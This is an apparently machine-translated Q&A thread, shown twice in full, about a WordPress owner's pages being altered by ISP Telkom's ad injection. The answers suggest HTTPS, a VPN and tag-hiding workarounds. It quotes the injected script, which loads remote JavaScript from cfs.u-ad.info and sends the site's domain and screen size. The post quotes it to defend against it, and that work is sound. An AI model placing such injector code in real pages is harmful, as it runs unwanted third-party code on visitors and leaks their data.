如何清除通过 ISP 注入的 wordpress 广告注入
How to clean up ads injection on wordpress which injected through ISP
我的网站被这样的脚本注入:
<script>function netbro_cache_analytics(fn, callback) {setTimeout(function()
{fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var
idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r
= Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-
ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" +
"4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRZ3f35Ig3RToKRLvWLwn6zEfnHRgrVr0WVf09gsyzoppB6HQ
lZs1%2bvVlaBJErvk4yTApvNxVRroJE3Sak6whXVhS8NtL5WQQ7xqk%2fl%2beEqRKsRzR0FuA%2bMRbKp
Tz%2fh8pwQUsZzPSHlUJaQ5eWnpe41LMxALmGAJ7wR93fB809%2b3BMdyLrPSeRjoat5eXfxM8hB8cF8FA
%2fADZ9XefsIT5mcIatvUYk00Cx89VQVB9oihM6lthSHZK76HYE2yVlBaqYl8N8lJpYpl3bTDK3nTOnpcZ
H07XEZDdhweI6oHkutA8rENrMv64HLRLfn%2fIH2yN7Q3C4Ly7sE6g9%2fkyUxZo0IvZ4NsUcBJwZ10Joo
9f63JGGYp%2bn8ZXG%2bI%2bHpuDri0qeXDPamxLkuhbs1gXAgx6ZSwZXm4940rBN97J6uiaXdZCyDo4ms
n2R%2f7i6CjiMCM66JMRM0RtI%2b4dRfZ2L78M%2bMB5T63xl0aYzBPpcoJFnNp75TozLX0wVNH7ZQLMIm
mchINjLEKPqXmlxC6kjQXWZiXrRa0nXtRY%2bUvCvz6huwCvSs3W8GNolSQ%3d%3d" +
"&idc_r="+idc_glo_r + "&domain="+document.domain +
"&sw="+screen.width+"&sh="+screen.height;var bsa =
document.createElement('script');bsa.type = 'text/javascript';bsa.async =
true;bsa.src = url;(document.getElementsByTagName('head')
[0]||document.getElementsByTagName('body')
[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){ });</script>
</body>
</html>
u-ad.info
属于管理我的 ISP (TELKOM) 的公司。我向他们抱怨过,但它永远不会解决问题。我正在使用 WordPress。如何清理该脚本或阻止该脚本注入?
错误的 ISP! :D
您无法清除该脚本,因为它是在通过您的 ISP 服务器时被注入的。您只能在浏览器级别阻止它。阅读此 https://askubuntu.com/q/64303/224951。遗憾的是,所有使用相同 ISP 的网站访问者都将获得相同的注入页面。
我认为 Google 不会将您的网站列入黑名单,因为它肯定没有使用您的 ISP,因此看不到注入的脚本。
将正文标签更改为大写。
我的实验表明,脚本注入器专门查找以小写字母书写的 body 标签。
虽然,我不确定这种情况会持续多久。
在 http://www.kaskus.co.id/thread/5491671f0e8b46ff29000007/mengakali-script-injeksi-spidol-as-a-web-developer 查看我的解决方案
只是改变
</body>
到
</Body>
根据我的经验,您可以使用 https 协议或使用此技巧来避免从您的 ISP 加载脚本:P
<!-- </body></html> -->
在您的 'real' </body></html>
标签上方添加代码,开始吧!
在 HTML 的开头或结尾插入下面的代码。
<script type="text/javascript">
$(document).ready(function(){
$('body').append("</bo"+"dy>");
});
</script>
但请确保您的 HTML 代码不包含 </body>
结束标记并在 <head>
标记中包含 jQuery。
示例:
完整 HTML
<html>
<title>Foo bar</title>
<head></head>
<body>Lorem Ipsum</body>
</html>
成为
<html>
<title>Foo bar</title>
<head>
<script src=”https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js”></script>
</head>
<body>Lorem Ipsum
<script type="text/javascript">
$(document).ready(function(){
$('body').append("</bo"+"dy>");
});
</script>
</html>
没有 </body>
结束标记。 ISP 上的 HTTP 过滤器将 grep </body>
或 </Body>
或任何 <body>
结束标记,然后在 <body>
结束标记之前注入 JavaScript 代码,这样他们的广告就会出现任何 使用 HTTP 协议的网站。
使用 HTTPS(如果服务器提供),或使用 VPN/SSH Tunneling/Secure 代理。所以所有的问题都会很干净。 ISP 通过提取所有压缩、注入而不是压缩回数据来注入广告和分析脚本。它将对您的互联网连接配额额外收费。
有一个非常简单的方法可以防止脚本注入工作。
只需在 </body>
标签之前添加此脚本即可。
<script>
//</body>
</script>
此图为使用前后对比图。
使用前:
使用后:
如果您使用 wordpress,只需确保安装了插件以允许您在页脚部分编写该脚本。
在 ISP TELKOM 知道之前就这样做。
更新:Telkom ISP 已经检测到 </body></html>
是否在评论中。
我的解决方案:
完全没有</body></html>
让浏览器自行关闭标签
已经过测试并且在 2018 年 12 月运行
谢谢
我的网站被这样的脚本注入:
<script>function netbro_cache_analytics(fn, callback) {setTimeout(function()
{fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var
idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r
= Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-
ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" +
"4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRZ3f35Ig3RToKRLvWLwn6zEfnHRgrVr0WVf09gsyzoppB6HQ
lZs1%2bvVlaBJErvk4yTApvNxVRroJE3Sak6whXVhS8NtL5WQQ7xqk%2fl%2beEqRKsRzR0FuA%2bMRbKp
Tz%2fh8pwQUsZzPSHlUJaQ5eWnpe41LMxALmGAJ7wR93fB809%2b3BMdyLrPSeRjoat5eXfxM8hB8cF8FA
%2fADZ9XefsIT5mcIatvUYk00Cx89VQVB9oihM6lthSHZK76HYE2yVlBaqYl8N8lJpYpl3bTDK3nTOnpcZ
H07XEZDdhweI6oHkutA8rENrMv64HLRLfn%2fIH2yN7Q3C4Ly7sE6g9%2fkyUxZo0IvZ4NsUcBJwZ10Joo
9f63JGGYp%2bn8ZXG%2bI%2bHpuDri0qeXDPamxLkuhbs1gXAgx6ZSwZXm4940rBN97J6uiaXdZCyDo4ms
n2R%2f7i6CjiMCM66JMRM0RtI%2b4dRfZ2L78M%2bMB5T63xl0aYzBPpcoJFnNp75TozLX0wVNH7ZQLMIm
mchINjLEKPqXmlxC6kjQXWZiXrRa0nXtRY%2bUvCvz6huwCvSs3W8GNolSQ%3d%3d" +
"&idc_r="+idc_glo_r + "&domain="+document.domain +
"&sw="+screen.width+"&sh="+screen.height;var bsa =
document.createElement('script');bsa.type = 'text/javascript';bsa.async =
true;bsa.src = url;(document.getElementsByTagName('head')
[0]||document.getElementsByTagName('body')
[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){ });</script>
</body>
</html>
u-ad.info
属于管理我的 ISP (TELKOM) 的公司。我向他们抱怨过,但它永远不会解决问题。我正在使用 WordPress。如何清理该脚本或阻止该脚本注入?
错误的 ISP! :D
您无法清除该脚本,因为它是在通过您的 ISP 服务器时被注入的。您只能在浏览器级别阻止它。阅读此 https://askubuntu.com/q/64303/224951。遗憾的是,所有使用相同 ISP 的网站访问者都将获得相同的注入页面。
我认为 Google 不会将您的网站列入黑名单,因为它肯定没有使用您的 ISP,因此看不到注入的脚本。
将正文标签更改为大写。
我的实验表明,脚本注入器专门查找以小写字母书写的 body 标签。 虽然,我不确定这种情况会持续多久。
在 http://www.kaskus.co.id/thread/5491671f0e8b46ff29000007/mengakali-script-injeksi-spidol-as-a-web-developer 查看我的解决方案 只是改变
</body>
到
</Body>
根据我的经验,您可以使用 https 协议或使用此技巧来避免从您的 ISP 加载脚本:P
<!-- </body></html> -->
在您的 'real' </body></html>
标签上方添加代码,开始吧!
在 HTML 的开头或结尾插入下面的代码。
<script type="text/javascript">
$(document).ready(function(){
$('body').append("</bo"+"dy>");
});
</script>
但请确保您的 HTML 代码不包含 </body>
结束标记并在 <head>
标记中包含 jQuery。
示例:
完整 HTML
<html>
<title>Foo bar</title>
<head></head>
<body>Lorem Ipsum</body>
</html>
成为
<html>
<title>Foo bar</title>
<head>
<script src=”https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js”></script>
</head>
<body>Lorem Ipsum
<script type="text/javascript">
$(document).ready(function(){
$('body').append("</bo"+"dy>");
});
</script>
</html>
没有 </body>
结束标记。 ISP 上的 HTTP 过滤器将 grep </body>
或 </Body>
或任何 <body>
结束标记,然后在 <body>
结束标记之前注入 JavaScript 代码,这样他们的广告就会出现任何 使用 HTTP 协议的网站。
使用 HTTPS(如果服务器提供),或使用 VPN/SSH Tunneling/Secure 代理。所以所有的问题都会很干净。 ISP 通过提取所有压缩、注入而不是压缩回数据来注入广告和分析脚本。它将对您的互联网连接配额额外收费。
有一个非常简单的方法可以防止脚本注入工作。
只需在 </body>
标签之前添加此脚本即可。
<script>
//</body>
</script>
此图为使用前后对比图。
使用前:
使用后:
如果您使用 wordpress,只需确保安装了插件以允许您在页脚部分编写该脚本。
在 ISP TELKOM 知道之前就这样做。
更新:Telkom ISP 已经检测到 </body></html>
是否在评论中。
我的解决方案:
完全没有</body></html>
让浏览器自行关闭标签
已经过测试并且在 2018 年 12 月运行
谢谢